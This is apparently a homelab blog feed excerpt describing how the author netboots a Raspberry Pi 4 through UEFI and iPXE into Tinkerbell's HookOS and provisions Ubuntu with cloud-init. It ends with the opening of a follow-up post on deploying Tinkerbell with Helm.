    <img loading="lazy" src="uefi-fw-screen.jpg"
         alt="A picture of a screen showing the UEFI firmware config screen. Similar to an x86 UEFI menu, it shows information about the Pi like its CPU and RAM. Options include setting the language, and entering submenus for Device Manager, Boot Manager and Boot Maintenance Manager. It doesn&#39;t show any indication of why the UEFI menu is shown."/> <figcaption>
            <p>Instead of booting HookOS, I&rsquo;m ending up in the UEFI config menu.</p>
        </figcaption>
</figure>

<p>To fix the issue, I had to tell iPXE where to fetch the iPXE script, which I did
with the following lines in the Dnsmasq config:</p>
<pre tabindex="0"><code>dhcp-match=tinkerbell, option:user-class, Tinkerbell
pxe-service=tag:tinkerbell,ARM64_EFI,&#34;EFI Netboot IPXE&#34;,http://203.0.113.200/auto.ipxe
</code></pre><p>This had no effect at all, or at least that was what it looked like to me. I just
ended up on the same UEFI screen. But right before that, I saw flashes of an
error message, but wasn&rsquo;t able to really see it. After some vain attempts at
changing the <code>pxe-service</code> line, I gave in and connected a keyboard. Pressing
CTRL+b right after the iPXE binary started running, I got into an iPXE shell.
I then just ran the <code>autoboot</code> command and finally got my error: The DHCP
response was correct, iPXE was trying to fetch the iPXE script from the right
place, it seemed. But it got a &ldquo;Connection reset by peer&rdquo; error. And then it
dawned on me: Tinkerbell&rsquo;s HTTP server wasn&rsquo;t running on port 80. So the fix
was simple: I changed the two lines from above to these:</p>
<pre tabindex="0"><code>dhcp-match=tinkerbell, option:user-class, Tinkerbell
dhcp-boot=tag:tinkerbell,&#34;http://203.0.113.200:7171/auto.ipxe&#34;,,&#34;{{ .Values.tinkerbellIP }}&#34;
</code></pre><p>The switch from <code>pxe-service</code> to <code>dhcp-boot</code> was necessary because iPXE
was not requesting PXE options in its DHCP request, and consequently, Dnsmasq did
not send a PXE answer. Instead, iPXE simply expected the boot file option to be
set.</p>
<p>The <code>auto.ipxe</code> &ldquo;file&rdquo; is a clever implementation detail from Tinkerbell worth
talking about a bit. This file is an iPXE script, which runs the <a href="https://ipxe.org/cmd">iPXE commands</a>
in batch mode. The script can be found <a href="https://github.com/tinkerbell/tinkerbell/blob/v0.18.3/smee/internal/ipxe/script/hook.go">here</a>.
Instead of delivering a static script of some sort, Tinkerbell dynamically generates
the iPXE script for each individual host. The script always does the same thing
in principle: It loads the kernel and initramfs and defines the kernel command
line and then boots into the kernel. But due to the dynamic nature, the kernel
and initramfs can be set individually for every host in the Hardware manifest.</p>
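<p>Stripped of the host-specific details, the generated script has roughly the following
shape. The URLs, file names and kernel parameters are made-up placeholders, not what
Tinkerbell actually emits:</p>
<pre tabindex="0"><code>#!ipxe
# Rough shape of a generated auto.ipxe script; all values are placeholders
kernel http://203.0.113.200:7171/vmlinuz-aarch64 console=tty0 worker_id=e4:5f:01:bc:f4:ce
initrd http://203.0.113.200:7171/initramfs-aarch64
boot
</code></pre>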
<h2 id="getting-tinkerbell-to-send-the-autoipxe-script">Getting Tinkerbell to send the auto.ipxe script</h2>
<p>At this point, I was getting errors from Tinkerbell, because I hadn&rsquo;t created a
Hardware object for the Pi yet. I created this one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Hardware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testpi</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">instance</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">id</span>: <span style="color:#ae81ff">e4:5f:01:bc:f4:ce</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ips</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">address</span>: <span style="color:#ae81ff">203.0.113.70</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allow_pxe</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">testpi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operating_system</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">distro</span>: <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">version</span>: <span style="color:#e6db74">&#34;24.04&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">disks</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">device</span>: <span style="color:#ae81ff">/dev/sda</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interfaces</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">dhcp</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">arch</span>: <span style="color:#ae81ff">aarch64</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">testpi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mac</span>: <span style="color:#ae81ff">e4:5f:01:bc:f4:ce</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ip</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">address</span>: <span style="color:#ae81ff">203.0.113.70</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">netmask</span>: <span style="color:#ae81ff">255.255.255.0</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name_servers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">10.86.25.254</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">uefi</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">netboot</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowPXE</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowWorkflow</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">userData</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    #cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    packages:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - openssh-server
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - python3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - sudo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    ssh_pwauth: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    disable_root: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    allow_public_ssh_keys: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    timezone: &#34;Europe/Berlin&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    users:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: imhotep
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        shell: /bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ssh_authorized_keys:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - from=&#34;192.0.2.100&#34; ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaxn8l16GNyBEgYzWO0BAko9fw8kkIq9tbels3hXdUt user@foo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        sudo: ALL=(ALL:ALL) ALL
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    runcmd:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - systemctl enable ssh.service
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - systemctl start ssh.service
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    power_state:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      delay: 2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      timeout: 2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      mode: reboot</span>
</span></span></code></pre></div><p>Note especially the <code>spec.interfaces.netboot.allowPXE: false</code> option. This tells
Tinkerbell that it shouldn&rsquo;t be sending any answer to the host&rsquo;s DHCP requests
while PXE booting. I had to set the option, because by default, Tinkerbell
would answer the initial DHCP request with a DHCP reply instructing the Pi to
download the iPXE binary from Tinkerbell straight away. This works with normal
PXE boot, but the Pi&rsquo;s network boot is a bit special. It has to get stuff like
the <code>config.txt</code> file from the TFTP server as well, and Tinkerbell can&rsquo;t do that.
Yet. I will go into a bit more detail at the end.</p>
<p>But even with this config set, the <code>auto.ipxe</code> script was not getting delivered.
This time, Tinkerbell logged the following error message:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2025-06-26T19:02:24.911697105Z&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;smee/internal/ipxe/script/ipxe.go:169&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;the hardware data for this machine, or lack there of, does not allow it to pxe&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;service&#34;</span>:<span style="color:#e6db74">&#34;smee&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;client&#34;</span>:<span style="color:#e6db74">&#34;203.0.113.70:42502&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;error&#34;</span>:<span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2025-06-26T19:02:24.911752728Z&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;0&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;smee/internal/ipxe/http/middleware.go:37&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;response&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;service&#34;</span>:<span style="color:#e6db74">&#34;smee&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;method&#34;</span>:<span style="color:#e6db74">&#34;GET&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;uri&#34;</span>:<span style="color:#e6db74">&#34;/auto.ipxe&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;client&#34;</span>:<span style="color:#e6db74">&#34;203.0.113.70&#34;</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;duration&#34;</span>:<span style="color:#ae81ff">160896</span>,
</span></span><span style="display:flex;"><span><span style="color:#f92672">&#34;status&#34;</span>:<span style="color:#ae81ff">404</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>So because <code>allowPXE</code> is <code>false</code> for the Pi, it also doesn&rsquo;t get to download
the <code>auto.ipxe</code> script. My ultimate solution for this was to completely disable
DHCP for Tinkerbell and then set <code>allowPXE: true</code> for the Pi.
I was able to disable DHCP completely with this setting in Tinkerbell&rsquo;s <code>values.yaml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">deployment</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">envs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">smee</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dhcpEnabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>And after that, the Pi was able to boot into HookOS without further issue. I will talk
about why this is suboptimal in the last section of this post.</p>
<h2 id="provisioning-the-pi">Provisioning the Pi</h2>
<p>Setting up the actual provisioning went rather smoothly after all of that. I
followed the same approach as I did for the VM in the <a href="https://blog.mei-home.net/posts/tinkerbell-3-install-and-first-provisioning/">previous post</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">pi-template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    name: pi-template
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    version: &#34;0.1&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    global_timeout: 600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    tasks:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: &#34;os installation&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        worker: &#34;{{`{{.machine_mac}}`}}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev:/dev
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev/console:/dev/console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        actions:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;install ubuntu&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/image2disk:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 900
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                IMG_URL: https://s3.example.com/public/images/mypi-image.img
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                DEST_DISK: /dev/sda
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                COMPRESSED: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;add cloud-init config&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /etc/cloud/cloud.cfg.d/10_tinkerbell.cfg
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: &#34;0700&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: ext4
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: &#34;0&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: &#34;0600&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: &#34;0&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                datasource:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  Ec2:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    metadata_urls: [&#34;http://203.0.113.200:7172&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    strict_id: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                manage_etc_hosts: localhost
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                warnings:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  dsid_missing_source: off
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;add cloud-init ds-identity&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: ext4
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /etc/cloud/ds-identify.cfg
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: 0600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: 0700
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                datasource: Ec2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;remove default user data&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 1 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: vfat
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /user-data
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: 0600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: 0700
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                # Removed during provisioning
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;remove default meta data&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 1 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: vfat
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /meta-data
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: 0600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: 0700
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                # Removed during provisioning
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;remove default network config&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/writefile:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_DISK: {{ `{{ formatPartition ( index .Hardware.Disks 0 ) 1 }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              FS_TYPE: vfat
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DEST_PATH: /network-config
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              UID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              GID: 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MODE: 0600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              DIRMODE: 0700
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CONTENTS: |
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                # Removed during provisioning
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;reboot&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: ghcr.io/jacobweinstock/waitdaemon:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 90
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            pid: host
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            command: [&#34;reboot&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              IMAGE: alpine
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              WAIT_SECONDS: 10
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              - /var/run/docker.sock:/var/run/docker.sock</span>
</span></span></code></pre></div><p>The one noteworthy change here is in the files I&rsquo;m removing/emptying. The
VM image I had created myself via the Ubuntu installer and Packer, but for
the Pi I was able to use the official Ubuntu preinstalled Raspberry Pi image.
That image, however, ships with default <code>user-data</code>, <code>meta-data</code> and <code>network-config</code>
files. In the Pi image, they are located on the boot partition:</p>
<ul>
<li><code>/user-data</code></li>
<li><code>/meta-data</code></li>
<li><code>/network-config</code></li>
</ul>
<p>With these files removed, the Ubuntu image properly made use of the metadata
server Tinkerbell provides and executed the <code>user-data</code> instructions delivered
by it and defined in the Hardware object of the Raspberry Pi.</p>
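<p>For context, this is roughly how that <code>user-data</code> can be attached to the host: a
minimal, hypothetical sketch of a Hardware object carrying a cloud-init snippet. The
<code>userData</code> field name and all values here are my assumptions for illustration only,
so check the Hardware CRD reference before copying anything from it.</p>
<pre tabindex="0"><code>apiVersion: tinkerbell.org/v1alpha1
kind: Hardware
metadata:
  name: testpi
spec:
  interfaces:
  - dhcp:
      mac: d8:3a:dd:00:00:01      # placeholder MAC
      hostname: testpi
    netboot:
      allowPXE: true
      allowWorkflow: true
  # served to the host via the EC2-style metadata endpoint configured above;
  # the field name is an assumption, see the Hardware CRD docs
  userData: |
    #cloud-config
    hostname: testpi
    users:
      - name: ansible
        ssh_authorized_keys:
          - ssh-ed25519 AAAA...   # placeholder key
</code></pre>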
<p>So now I finally had a fully provisioned Pi, without any manual intervention:</p>
<figure>
    <img loading="lazy" src="pi-ubuntu-booted.jpg"
         alt="A picture of a screen showing the final lines of an Ubuntu boot. It shows the Ubuntu version as 24.02.2 LTS, some lines indicating that cloud-init ran successfully and finally a login prompt for the host testpi."/> <figcaption>
            <p>Final successful Ubuntu provisioned boot.</p>
        </figcaption>
</figure>

<h2 id="next-steps">Next steps</h2>
<p>The next phase of the Tinkerbell project will require me to don my thinking cap
and probably try to write some Go code. As I&rsquo;ve shown above, booting a Pi 4 is
possible. But provisioning a Pi 5 the same way is not, because the Pi 5 UEFI
project seems to be dead, judging by the <a href="https://github.com/worproject/rpi5-uefi">archived repo</a>.
Additionally, the approach I&rsquo;ve shown above requires DHCP to be completely
switched off in Tinkerbell, because I needed to enable <code>allowPXE</code> to get the
<code>auto.ipxe</code> script, but at the same time Tinkerbell cannot provide the files
necessary for the initial PXE boot into UEFI/iPXE for a Pi.</p>
<p>But there might be a way around all of these issues, which should also work with
the Pi 5: Booting into HookOS directly, skipping UEFI and iPXE. This should be
possible by setting HookOS&rsquo; kernel and initramfs in the <code>config.txt</code> file for
direct boot via the Pi&rsquo;s firmware. The downside of this approach is that I&rsquo;m losing
Tinkerbell&rsquo;s ability of adapting e.g. the kernel command line dynamically, as it
does when booting through the iPXE script. Tinkerbell would only enter the picture
after HookOS is already booted up.</p>
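<p>To make that idea a bit more concrete, here is a sketch of what such a
<code>config.txt</code> could look like. It is untested, the file names are placeholders,
and the HookOS kernel and initramfs would first have to be copied onto the Pi&rsquo;s
boot partition:</p>
<pre tabindex="0"><code># /boot/firmware/config.txt - sketch, untested
arm_64bit=1
# boot the HookOS kernel directly via the Pi firmware, no UEFI/iPXE involved
kernel=vmlinuz-hookos
initramfs initramfs-hookos followkernel
# the (now static) kernel command line would live in cmdline.txt
</code></pre>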
<p>Then there&rsquo;s also the issue with diskless hosts which netboot not only for their
initial provisioning via Tinkerbell, but instead would always netboot. The
biggest issue here is how to distinguish between the two. When the host needs to
be provisioned, it needs to be told to PXE boot into HookOS. If it is just doing
a normal boot, it needs to boot into its own kernel and initramfs. The best
decision point I can imagine for that are Tinkerbell&rsquo;s workflows. They can be in
different states, and they&rsquo;re set to a &ldquo;done&rdquo; state when all of their tasks have
been executed successfully for a given host. So whenever a DHCP request arrives,
I could check whether that host has any pending workflows. If it does, I tell
it to boot into HookOS, and otherwise I have it continue the boot normally.</p>
<p>Lots to think about. But I&rsquo;m enjoying it - there&rsquo;s certainly been a lot more &ldquo;lab&rdquo;
in my Homelab than usual. &#x1f601;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part III: Install and First Provisioning</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-3-install-and-first-provisioning/</link>
      <pubDate>Sat, 21 Jun 2025 20:30:01 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-3-install-and-first-provisioning/</guid>
      <description>I deploy Tinkerbell on my k3s cluster and provision the first VM with it</description>
      <content:encoded><![CDATA[<p>In this post, I will describe how I deployed <a href="https://tinkerbell.org/">Tinkerbell</a>
into my k3s cluster and provisioned the first Ubuntu VM with it.</p>
<p>This is part 3 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell series</a>.</p>
<h2 id="deploying-tinkerbell">Deploying Tinkerbell</h2>
<p>The first step is to deploy Tinkerbell into the k3s cluster I set up in the
<a href="https://blog.mei-home.net/posts/tinkerbell-2-lab-setup/">previous post</a>. For this, I used
the official Helm chart, which can be found <a href="https://github.com/tinkerbell/tinkerbell/tree/main/helm/tinkerbell">here</a>.</p>
<p>My <code>values.yaml</code> file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">publicIP</span>: <span style="color:#e6db74">&#34;203.0.113.200&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">trustedProxies</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;10.42.0.0/24&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">artifactsFileServer</span>: <span style="color:#e6db74">&#34;http://203.0.113.200:7173&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">deployment</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">envs</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tinkController</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enableLeaderElection</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">smee</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dhcpMode</span>: <span style="color:#e6db74">&#34;proxy&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">globals</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enableRufioController</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enableSecondstar</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">logLevel</span>: <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">init</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">lbClass</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">optional</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">hookos</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">lbClass</span>: <span style="color:#e6db74">&#34;&#34;</span>
